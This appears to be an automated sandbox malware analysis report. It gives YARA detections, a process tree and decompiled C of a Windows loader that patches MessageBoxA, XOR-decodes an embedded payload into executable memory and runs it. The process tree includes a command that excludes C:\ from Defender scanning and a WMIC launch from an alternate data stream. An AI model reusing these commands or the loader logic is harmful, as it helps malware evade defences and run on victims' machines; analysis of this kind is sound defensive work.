                    • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000003.00000002.525763010.0000000003A1F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000003.00000002.525763010.0000000003A1F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                    Antivirus matches:
                    • Detection: 17%, ReversingLabs
                    Reputation:low

                    General

                    Target ID:6
                    Start time:21:37:50
                    Start date:15/05/2022
                    Path:C:\Windows\System32\cmd.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
                    Imagebase:0x7ff670f90000
                    File size:273920 bytes
                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:8
                    Start time:21:37:50
                    Start date:15/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:9
                    Start time:21:37:51
                    Start date:15/05/2022
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create '"C:\ProgramData:ApplicationData"'
                    Imagebase:0x7ff630f20000
                    File size:521728 bytes
                    MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                    Has elevated privileges:false
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Target ID:13
                    Start time:21:37:55
                    Start date:15/05/2022
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:powershell Add-MpPreference -ExclusionPath C:\
                    Imagebase:0x9b0000
                    File size:430592 bytes
                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:.Net C# or VB.NET
                    Reputation:high

                    General

                    Target ID:14
                    Start time:21:37:55
                    Start date:15/05/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\System32\cmd.exe
                    Imagebase:0xc20000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:15
                    Start time:21:37:55
                    Start date:15/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:16
                    Start time:21:37:56
                    Start date:15/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7c9170000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:18
                    Start time:21:38:18
                    Start date:15/05/2022
                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Imagebase:0x7ff674600000
                    File size:488448 bytes
                    MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                    Has elevated privileges:true
                    Has administrator privileges:false
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:0.7%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:3.6%
                      Total number of Nodes:253
                      Total number of Limit Nodes:13
                      execution_graph 36164 94ba90 36 API calls ~Module 36168 9abc90 EnterCriticalSection LeaveCriticalSection 36170 94d280 40 API calls ~Module 36177 943e80 36 API calls ~Module 36179 96c280 53 API calls pre_c_initialization 36180 9ae680 MultiByteToWideChar __fassign 36183 94ceb0 38 API calls 2 library calls 36189 956aa9 GetProcessHeap HeapFree InterlockedPushEntrySList 36191 957ed0 7 API calls 36196 9474c0 53 API calls 2 library calls 36197 9594c0 InterlockedFlushSList ___std_type_info_destroy_list 36199 9a6ec0 12 API calls 5 library calls 36201 9452f0 36 API calls 2 library calls 35927 9572f0 35934 957330 InitializeCriticalSectionAndSpinCount GetModuleHandleW 35927->35934 35929 957310 35946 958270 35929->35946 35930 9572f8 35930->35929 35945 958a40 4 API calls 2 library calls 35930->35945 35933 95731a 35935 957368 35934->35935 35936 95735a GetModuleHandleW 35934->35936 35937 957375 GetProcAddress GetProcAddress 35935->35937 35938 95736e 35935->35938 35936->35935 35940 95739f 35937->35940 35941 9573b8 CreateEventW 35937->35941 35949 958a40 4 API calls 2 library calls 35938->35949 35940->35941 35942 9573a5 35940->35942 35941->35942 35943 9573d4 35941->35943 35942->35930 35950 958a40 4 API calls 2 library calls 35943->35950 35945->35929 35951 9581c0 35946->35951 35949->35937 35950->35942 35952 9581d4 35951->35952 35953 9581fa 35951->35953 35957 99cb50 21 API calls _atexit 35952->35957 35958 99cc00 21 API calls 2 library calls 35953->35958 35956 9581dd 35956->35933 35957->35956 35958->35956 36206 9a5af0 13 API calls 3 library calls 36210 9412e0 49 API calls 2 library calls 36211 94e4e0 62 API calls ~Module 36212 9468e0 36 API calls ~Module 36214 9546e0 37 API calls ~Module 36215 96b4e0 RtlUnwind 36216 96c4e0 52 API calls pre_c_initialization 36217 946c10 36 API calls ~Module 36218 957410 EnterCriticalSection SetEvent ResetEvent LeaveCriticalSection __Init_thread_abort 36222 941000 46 API calls ~Module 36227 95e400 5 API calls _RTC_StackFailure 36229 9a6400 GetLastError 36231 94c830 88 API calls 2 library calls 35959 958430 35960 958438 pre_c_initialization 35959->35960 35979 9587b0 35960->35979 35962 95843d pre_c_initialization 35963 95845a __RTC_Initialize 35962->35963 35997 958a40 4 API calls 2 library calls 35962->35997 35965 958270 _atexit 21 API calls 35963->35965 35966 95846b 35965->35966 35983 957c20 35966->35983 35969 95847e 35987 9594b0 InitializeSListHead 35969->35987 35972 958483 pre_c_initialization ___scrt_is_user_matherr_present 35988 9594f0 35972->35988 35974 9584a8 pre_c_initialization 35993 99f020 35974->35993 35976 9584b3 pre_c_initialization 35977 9584dc 35976->35977 35999 958a40 4 API calls 2 library calls 35976->35999 35980 9587b8 pre_c_initialization 35979->35980 36000 99d940 35980->36000 35982 9587be 35982->35962 35984 957c28 pre_c_initialization 35983->35984 36005 99b950 35984->36005 35987->35972 36023 9a0cc0 35988->36023 35990 959512 35990->35974 35991 959504 35991->35990 36027 958a40 4 API calls 2 library calls 35991->36027 35995 99f02d 35993->35995 35994 99f069 35994->35976 35995->35994 36029 992900 11 API calls 2 library calls 35995->36029 35997->35963 35998 958a40 4 API calls 2 library calls 35998->35969 35999->35977 36001 99d952 36000->36001 36002 99d9cc pre_c_initialization 36001->36002 36004 992900 11 API calls 2 library calls 36001->36004 36002->35982 36004->36002 36008 99a760 36005->36008 36007 957c2e 36007->35969 36007->35998 36013 99a776 36008->36013 36018 99a76f std::_Timevec::_Timevec pre_c_initialization 36008->36018 36009 99a7ca 36019 992900 11 API calls 2 library calls 36009->36019 36010 99a7fd 36020 99b670 27 API calls pre_c_initialization 36010->36020 36012 99a804 36021 99aca0 18 API calls pre_c_initialization 36012->36021 36013->36009 36013->36010 36016 99a827 std::_Timevec::_Timevec pre_c_initialization 36016->36018 36022 99b690 34 API calls pre_c_initialization 36016->36022 36018->36007 36019->36018 36020->36012 36021->36016 36022->36018 36024 9a0ce5 __initialize_default_precision 36023->36024 36026 9a0d68 __initialize_default_precision 36023->36026 36024->36026 36028 992900 11 API calls 2 library calls 36024->36028 36026->35991 36027->35990 36028->36026 36029->35994 36233 952030 74 API calls 4 library calls 36234 958230 21 API calls _atexit 36237 957e30 11 API calls 36242 946820 36 API calls ~Module 36243 951020 38 API calls 2 library calls 36245 957820 5 API calls ___raise_securityfailure 36246 96b220 LoadLibraryExW GetLastError LoadLibraryExW _wcsncmp 36247 962420 6 API calls 5 library calls 36248 97d820 41 API calls 36251 95c850 3 API calls 3 library calls 36252 9d2450 10 API calls _unexpected 36258 945840 36 API calls ~Module 36259 94d840 57 API calls 3 library calls 36261 977640 EnterCriticalSection std::_Mutex::_Lock 36264 943a70 38 API calls ~Module 36265 95c270 26 API calls 6 library calls 36266 950670 36 API calls 2 library calls 36268 96c870 45 API calls pre_c_initialization 36271 946860 36 API calls ~Module 36273 954660 37 API calls ~Module 36274 96b663 14 API calls _RTC_StackFailure 36276 96bf94 LeaveCriticalSection std::_Mutex::_Lock 36278 943790 37 API calls ~Module 36279 956190 36 API calls 3 library calls 36283 94df80 38 API calls ~Module 36281 945180 37 API calls 3 library calls 36284 958180 DeleteCriticalSection TlsFree ___scrt_uninitialize_crt 36287 9469b0 36 API calls 2 library calls 36290 957db0 49 API calls 2 library calls 36292 96c3b0 53 API calls pre_c_initialization 36153 99d7b0 36155 99d7c0 36153->36155 36154 99d7f1 36155->36154 36157 9584f0 36155->36157 36162 958c70 SetUnhandledExceptionFilter 36157->36162 36159 9584f8 36163 9a0c10 11 API calls 2 library calls 36159->36163 36161 958503 36161->36155 36162->36159 36163->36161 36296 9413a0 50 API calls 3 library calls 36298 9413d0 40 API calls ~Module 36300 9599d0 12 API calls 2 library calls 36301 956fda 11 API calls _memmove_s 36306 955fc0 47 API calls 3 library calls 36309 95c7f0 GetLastError SetLastError TlsGetValue ___vcrt_getptd_noinit 36312 95fbf0 DName::operator+= Mailbox DName::operator+= 36315 9593e0 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 36317 9573e0 DeleteCriticalSection CloseHandle 36318 958be0 GetModuleHandleW 36324 94d300 40 API calls ~Module 36326 97ab00 23 API calls 2 library calls 36329 977530 51 API calls 3 library calls 36334 957b20 GetLastError SetLastError TlsGetValue TlsSetValue _unexpected 36337 965350 49 API calls 3 library calls 36340 941340 51 API calls ~Module 36341 944740 36 API calls ~Module 36030 958740 36037 958b80 36030->36037 36049 95af80 36037->36049 36040 95874b 36041 99d790 36040->36041 36051 99d550 36041->36051 36043 958756 36044 9cf790 36043->36044 36062 94cb60 GetCommandLineA 36044->36062 36048 95876d 36050 958b93 GetStartupInfoW 36049->36050 36050->36040 36054 99d710 36051->36054 36053 99d55f 36053->36043 36057 9afc50 36054->36057 36058 99d71a 36057->36058 36059 9afc67 pre_c_initialization 36057->36059 36058->36053 36059->36058 36061 9af960 27 API calls 4 library calls 36059->36061 36061->36059 36063 9d1520 ~Module 35 API calls 36062->36063 36064 94cb8b CoInitialize 36063->36064 36065 9d1520 ~Module 35 API calls 36064->36065 36066 94cb9f 36065->36066 36111 9cf830 VirtualAlloc 36066->36111 36070 94cc72 36071 94cd9e CoUninitialize 36070->36071 36083 94cca7 36070->36083 36144 957950 RaiseException EnterCriticalSection LeaveCriticalSection new Concurrency::cancel_current_task 36070->36144 36073 9d1520 ~Module 35 API calls 36071->36073 36072 94cbd2 36072->36070 36075 94cbf7 36072->36075 36078 944020 41 API calls 36072->36078 36086 94cc33 36072->36086 36143 943f80 38 API calls ~Module 36072->36143 36097 94cc14 36073->36097 36139 94d190 76 API calls ~Module 36075->36139 36076 94ccaf 36079 94ccc3 36076->36079 36080 94ccbb 36076->36080 36078->36072 36146 94dd40 73 API calls ~Module 36079->36146 36145 9d1350 35 API calls ~Module 36080->36145 36082 94cc03 36082->36097 36140 94d130 35 API calls ~Module 36082->36140 36083->36070 36085 94cdbf 36088 9d1520 ~Module 35 API calls 36085->36088 36141 94d160 35 API calls ~Module 36086->36141 36093 94cdcd 36088->36093 36092 94cc3b 36092->36097 36142 94d200 78 API calls ~Module 36092->36142 36106 9d1520 36093->36106 36094 94cced 36147 94c410 37 API calls ~Module 36094->36147 36149 9d14c0 35 API calls _RTC_StackFailure 36097->36149 36098 94ccfd 36099 94cd64 GetMessageA 36098->36099 36100 9d1520 ~Module 35 API calls 36099->36100 36101 94cd7d 36100->36101 36102 94cd96 36101->36102 36103 94cd81 DispatchMessageA 36101->36103 36148 94cef0 36 API calls ~Module 36102->36148 36104 9d1520 ~Module 35 API calls 36103->36104 36104->36098 36107 9d1523 36106->36107 36108 9d1522 36106->36108 36152 9d16d0 35 API calls failwithmessage 36107->36152 36108->36048 36110 9d1539 36110->36048 36112 9d1520 ~Module 35 API calls 36111->36112 36113 9cfa12 VirtualProtect 36112->36113 36114 9d1520 ~Module 35 API calls 36113->36114 36115 9cfa51 36114->36115 36118 9cfbad MessageBoxA 36115->36118 36123 9cfbdc MessageBoxA 36115->36123 36128 9cfc25 36115->36128 36116 9cfcda 36124 9d1520 ~Module 35 API calls 36116->36124 36117 9cfc52 MessageBoxA 36119 9d1520 ~Module 35 API calls 36117->36119 36120 9d1520 ~Module 35 API calls 36118->36120 36121 9cfc6f MessageBoxA 36119->36121 36120->36115 36125 9d1520 ~Module 35 API calls 36121->36125 36126 9d1520 ~Module 35 API calls 36123->36126 36127 9cfd73 36124->36127 36125->36128 36126->36115 36129 9cfd7c Sleep 36127->36129 36130 9cfd92 36127->36130 36128->36116 36128->36117 36132 9d1520 ~Module 35 API calls 36129->36132 36150 9d14c0 35 API calls _RTC_StackFailure 36130->36150 36132->36127 36133 9cfda1 36151 957280 5 API calls ___raise_securityfailure 36133->36151 36135 9cfdaf 36136 9d1520 ~Module 35 API calls 36135->36136 36137 94cbc5 36136->36137 36138 943f80 38 API calls ~Module 36137->36138 36138->36072 36139->36082 36140->36097 36141->36092 36142->36097 36143->36072 36144->36076 36145->36079 36146->36094 36147->36098 36148->36071 36149->36085 36150->36133 36151->36135 36152->36110 36342 96c740 52 API calls pre_c_initialization 36343 962940 22 API calls 10 library calls 36346 94d570 62 API calls ~Module 36347 946970 36 API calls ~Module 36348 954770 45 API calls 3 library calls 36349 959b70 7 API calls ___CxxFrameHandler 36350 96cd70 22 API calls 3 library calls 36352 941360 35 API calls ~Module 36353 941560 47 API calls ~Module 36354 94f760 42 API calls 2 library calls 36356 955360 73 API calls 4 library calls

                      Executed Functions

                      Function 00958C70 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 145 958c70-958c7f SetUnhandledExceptionFilter
                      C-Code - Quality: 100%
                      			E00958C70() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00958C90); // executed
				return _t1;
			}




                      0x00958c78
                      0x00958c7f

                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(00958C90,?,009584F8), ref: 00958C78
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: ef7df78354b0eab6ee781e67f3f77da4d67d855387475ebbc5fa98fc7e558717
                      • Instruction ID: 89f14b425a8d667a0a05f2f4749cc16a88c73a7ed6fa1fa5d530d1d3b11ac96d
                      • Opcode Fuzzy Hash: ef7df78354b0eab6ee781e67f3f77da4d67d855387475ebbc5fa98fc7e558717
                      • Instruction Fuzzy Hash: CEA022300CE30CB30B0023C3FC0A80A3B0CEA82A2B3000082FA0C00002CE82308003B2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009CF830 Relevance: 79.1, APIs: 8, Strings: 37, Instructions: 344windowmemorysleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 80%
                      			E009CF830(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				intOrPtr _v140;
				long _v148;
				void* _v156;
				struct HWND__* _v160;
				signed int _v164;
				struct HWND__* _v168;
				intOrPtr _v172;
				signed int _v176;
				struct HWND__* _v180;
				signed int _v184;
				signed int _v188;
				char _v192;
				signed int _t208;
				void* _t210;
				int _t213;
				void* _t239;
				void* _t243;
				void* _t244;
				int _t247;
				int _t251;
				int _t255;
				int _t256;
				int _t259;
				void* _t266;
				char _t323;
				void* _t325;
				int _t328;
				int _t332;
				void* _t336;
				void* _t337;
				signed int _t346;
				void* _t347;
				void* _t348;

				_t266 = __ebx;
				_t336 =  &_v192;
				memset(_t336, 0xcccccccc, 0x2f << 2);
				_t348 = _t347 + 0xc;
				_t337 = _t336 + 0x2f;
				_t208 =  *0xa0600c; // 0x5d529087
				_v8 = _t208 ^ _t346;
				_v24 = 0xa06998;
				_v28 = 0x3e800;
				_v132 = 0xa8;
				_v131 = 0xc1;
				_v130 = 0xd3;
				_v129 = 0x97;
				_v128 = 0x13;
				_v127 = 0xba;
				_v126 = 0x79;
				_v125 = 0x46;
				_v124 = 0x9d;
				_v123 = 0x64;
				_v122 = 0x3a;
				_v121 = 0xae;
				_v120 = 0x23;
				_v119 = 0x90;
				_v118 = 0xb5;
				_v117 = 0xfc;
				_v116 = 0x83;
				_v115 = 0x78;
				_v114 = 0x2b;
				_v113 = 0x4c;
				_v112 = 0xac;
				_v111 = 0xa2;
				_v110 = 0x16;
				_v109 = 0xa;
				_v108 = 0x76;
				_v107 = 0xa6;
				_v106 = 0x54;
				_v105 = 0xd3;
				_v104 = 0xbe;
				_v103 = 0xcc;
				_v102 = 0x92;
				_v101 = 0x26;
				_v100 = 0x94;
				_v99 = 9;
				_v98 = 0x69;
				_v97 = 0xb1;
				_v96 = 0xfb;
				_v95 = 0x13;
				_v94 = 0xdc;
				_v93 = 0xb2;
				_v92 = 0x68;
				_v91 = 0x9a;
				_v90 = 0xe4;
				_v89 = 0x21;
				_v88 = 0x20;
				_v87 = 0x4c;
				_v86 = 0x88;
				_v85 = 0x43;
				_v84 = 0x8d;
				_v83 = 0xe;
				_v82 = 0x36;
				_v81 = 0x6b;
				_v80 = 0x79;
				_v79 = 0xd9;
				_v78 = 0xd1;
				_v77 = 0x58;
				_v76 = 0x44;
				_v75 = 0x4d;
				_v74 = 0xf6;
				_v73 = 0x52;
				_v72 = 0x14;
				_v71 = 0x6e;
				_v70 = 0x8a;
				_v69 = 0xd5;
				_v68 = 0x1b;
				_v67 = 0xff;
				_v66 = 0x3c;
				_v65 = 0x1c;
				_v64 = 0xd1;
				_v63 = 0xfb;
				_v62 = 0x91;
				_v61 = 0x58;
				_v60 = 0x30;
				_v59 = 0x57;
				_v58 = 4;
				_v57 = 0x8f;
				_v56 = 0x32;
				_v55 = 0xd8;
				_v54 = 0xe9;
				_v53 = 0xcd;
				_v52 = 0x46;
				_v51 = 0x90;
				_v50 = 0xee;
				_v49 = 0x94;
				_v48 = 0x63;
				_v47 = 0xbb;
				_v46 = 0xa;
				_v45 = 0xc0;
				_v44 = 0x9a;
				_v43 = 0x50;
				_v42 = 0xf1;
				_v41 = 0xa9;
				_v40 = 0xa9;
				_v39 = 0xb0;
				_v38 = 0x69;
				_v37 = 0x1d;
				_v36 = 0x85;
				_v35 = 4;
				_v34 = 0x58;
				_v33 = 0x9d;
				_t210 = VirtualAlloc(0,  &M00A00000, 0x3000, 0x40); // executed
				_v140 = E009D1520(_t210, _t348 - _t348);
				_v148 = 0;
				_v156 = MessageBoxA;
				_t213 = VirtualProtect(_v156, 0x100, 0x40,  &_v148); // executed
				E009D1520(_t213, _t348 - _t348);
				 *((char*)(_t346 + 0xfffffffffffffff4)) =  *_v156;
				 *((char*)(_t346 + 0xbadba1)) =  *((intOrPtr*)(_v156 + (1 << 0)));
				 *((char*)(_t346 + 0xbadba1)) =  *((intOrPtr*)(_v156 + (1 << 1)));
				 *((char*)(_t346 + 0xfffffffffffffff7)) =  *((intOrPtr*)(_v156 + 3));
				 *_v156 = 0xc2;
				 *((char*)(_v156 + (1 << 0))) = 0x10;
				 *((char*)(_v156 + (1 << 1))) = 0;
				 *((char*)(_v156 + 3)) = 0x90;
				_v160 = 0;
				while(_v160 <= _v28 - 1) {
					_v164 =  !( *(_v24 + (_v28 - 1 - _v160) * 4));
					if(_v164 != 0) {
						 *((char*)(_v140 + _v160)) = _v164;
					}
					_v160 =  &(_v160->i);
				}
				_v168 = 0;
				while(1) {
					__eflags = _v168 - 0xeac40;
					if(_v168 >= 0xeac40) {
						break;
					}
					_v180 = 0;
					while(1) {
						__eflags = _v180 - 0x3ff;
						if(_v180 >= 0x3ff) {
							break;
						}
						_t256 = MessageBoxA(0, "1", "1", 1);
						__eflags = _t348 - _t348;
						E009D1520(_t256, _t348 - _t348);
						_v172 = _v28;
						__eflags = _v28 - 0x1f9;
						if(_v28 >= 0x1f9) {
							_v176 = 0x64;
						} else {
							_t259 = MessageBoxA(0, "1", "1", 1);
							__eflags = _t348 - _t348;
							E009D1520(_t259, _t348 - _t348);
							_v176 = 0;
						}
						_t332 =  &(_v180->i);
						__eflags = _t332;
						_v180 = _t332;
					}
					_v168 =  &(_v168->i);
				}
				_v184 = 0;
				while(1) {
					__eflags = _v184 - _v172;
					if(_v184 >= _v172) {
						break;
					}
					_t247 = MessageBoxA(0, "1", "1", 1);
					__eflags = _t348 - _t348;
					E009D1520(_t247, _t348 - _t348);
					asm("cdq");
					_v188 = _v184 % _v176;
					__eflags = _v184 - 0x1000000;
					if(_v184 != 0x1000000) {
						_t255 = _v140 + _v184;
						__eflags = _t255;
						 *_t255 =  *(_v140 + _v184) ^  *(_t346 + _v188 - 0x80);
					}
					_t251 = MessageBoxA(0, "1", "1", 2);
					__eflags = _t348 - _t348;
					E009D1520(_t251, _t348 - _t348);
					_t328 = _v184 + 1;
					__eflags = _t328;
					_v184 = _t328;
				}
				_v192 = _v140;
				 *_v156 =  *((intOrPtr*)(_t346 + 0xfffffffffffffff4));
				 *((char*)(_v156 + (1 << 0))) =  *((intOrPtr*)(_t346 + 0xbadba1));
				 *((char*)(_v156 + (1 << 1))) =  *((intOrPtr*)(_t346 + 0xbadba1));
				_t323 =  *((intOrPtr*)(_t346 + 0xfffffffffffffff7));
				 *((char*)(_v156 + 3)) = _t323;
				_t341 = _t348;
				_t239 = _v192();
				__eflags = _t348 - _t348;
				E009D1520(_t239, _t348 - _t348);
				while(1) {
					__eflags = 1;
					if(1 == 0) {
						break;
					}
					_t341 = _t348;
					Sleep(0x320); // executed
					__eflags = _t348 - _t348;
					E009D1520(1, _t348 - _t348);
				}
				E009D14C0(_t346, 0x9cfdc0);
				_t243 = 1;
				_t325 = _t323;
				_t244 = E00957280(_t243, _t266, _v8 ^ _t346, _t325, _t337, _t341);
				__eflags = _t346 - _t348 + 0xbc;
				return E009D1520(_t244, _t346 - _t348 + 0xbc);
			}











































































































































                      0x009cf830
                      0x009cf83b
                      0x009cf84b
                      0x009cf84b
                      0x009cf84b
                      0x009cf84d
                      0x009cf854
                      0x009cf857
                      0x009cf85e
                      0x009cf865
                      0x009cf869
                      0x009cf86d
                      0x009cf871
                      0x009cf875
                      0x009cf879
                      0x009cf87d
                      0x009cf881
                      0x009cf885
                      0x009cf889
                      0x009cf88d
                      0x009cf891
                      0x009cf895
                      0x009cf899
                      0x009cf89d
                      0x009cf8a1
                      0x009cf8a5
                      0x009cf8a9
                      0x009cf8ad
                      0x009cf8b1
                      0x009cf8b5
                      0x009cf8b9
                      0x009cf8bd
                      0x009cf8c1
                      0x009cf8c5
                      0x009cf8c9
                      0x009cf8cd
                      0x009cf8d1
                      0x009cf8d5
                      0x009cf8d9
                      0x009cf8dd
                      0x009cf8e1
                      0x009cf8e5
                      0x009cf8e9
                      0x009cf8ed
                      0x009cf8f1
                      0x009cf8f5
                      0x009cf8f9
                      0x009cf8fd
                      0x009cf901
                      0x009cf905
                      0x009cf909
                      0x009cf90d
                      0x009cf911
                      0x009cf915
                      0x009cf919
                      0x009cf91d
                      0x009cf921
                      0x009cf925
                      0x009cf929
                      0x009cf92d
                      0x009cf931
                      0x009cf935
                      0x009cf939
                      0x009cf93d
                      0x009cf941
                      0x009cf945
                      0x009cf949
                      0x009cf94d
                      0x009cf951
                      0x009cf955
                      0x009cf959
                      0x009cf95d
                      0x009cf961
                      0x009cf965
                      0x009cf969
                      0x009cf96d
                      0x009cf971
                      0x009cf975
                      0x009cf979
                      0x009cf97d
                      0x009cf981
                      0x009cf985
                      0x009cf989
                      0x009cf98d
                      0x009cf991
                      0x009cf995
                      0x009cf999
                      0x009cf99d
                      0x009cf9a1
                      0x009cf9a5
                      0x009cf9a9
                      0x009cf9ad
                      0x009cf9b1
                      0x009cf9b5
                      0x009cf9b9
                      0x009cf9bd
                      0x009cf9c1
                      0x009cf9c5
                      0x009cf9c9
                      0x009cf9cd
                      0x009cf9d1
                      0x009cf9d5
                      0x009cf9d9
                      0x009cf9dd
                      0x009cf9e1
                      0x009cf9e5
                      0x009cf9e9
                      0x009cf9ed
                      0x009cf9f1
                      0x009cfa05
                      0x009cfa12
                      0x009cfa18
                      0x009cfa27
                      0x009cfa44
                      0x009cfa4c
                      0x009cfa6a
                      0x009cfa87
                      0x009cfaa2
                      0x009cfabf
                      0x009cfad1
                      0x009cfae3
                      0x009cfaf4
                      0x009cfb06
                      0x009cfb0a
                      0x009cfb25
                      0x009cfb47
                      0x009cfb54
                      0x009cfb68
                      0x009cfb68
                      0x009cfb1f
                      0x009cfb1f
                      0x009cfb6c
                      0x009cfb76
                      0x009cfb76
                      0x009cfb80
                      0x00000000
                      0x00000000
                      0x009cfb86
                      0x009cfba1
                      0x009cfba1
                      0x009cfbab
                      0x00000000
                      0x00000000
                      0x009cfbbd
                      0x009cfbc3
                      0x009cfbc5
                      0x009cfbcd
                      0x009cfbd3
                      0x009cfbda
                      0x009cfc05
                      0x009cfbdc
                      0x009cfbec
                      0x009cfbf2
                      0x009cfbf4
                      0x009cfbf9
                      0x009cfbf9
                      0x009cfb98
                      0x009cfb98
                      0x009cfb9b
                      0x009cfb9b
                      0x009cfc1a
                      0x009cfc1a
                      0x009cfc25
                      0x009cfc40
                      0x009cfc46
                      0x009cfc4c
                      0x00000000
                      0x00000000
                      0x009cfc62
                      0x009cfc68
                      0x009cfc6a
                      0x009cfc75
                      0x009cfc7c
                      0x009cfc82
                      0x009cfc8c
                      0x009cfcb0
                      0x009cfcb0
                      0x009cfcb6
                      0x009cfcb6
                      0x009cfcc8
                      0x009cfcce
                      0x009cfcd0
                      0x009cfc37
                      0x009cfc37
                      0x009cfc3a
                      0x009cfc3a
                      0x009cfce0
                      0x009cfd0c
                      0x009cfd29
                      0x009cfd44
                      0x009cfd5d
                      0x009cfd61
                      0x009cfd64
                      0x009cfd66
                      0x009cfd6c
                      0x009cfd6e
                      0x009cfd73
                      0x009cfd78
                      0x009cfd7a
                      0x00000000
                      0x00000000
                      0x009cfd7c
                      0x009cfd83
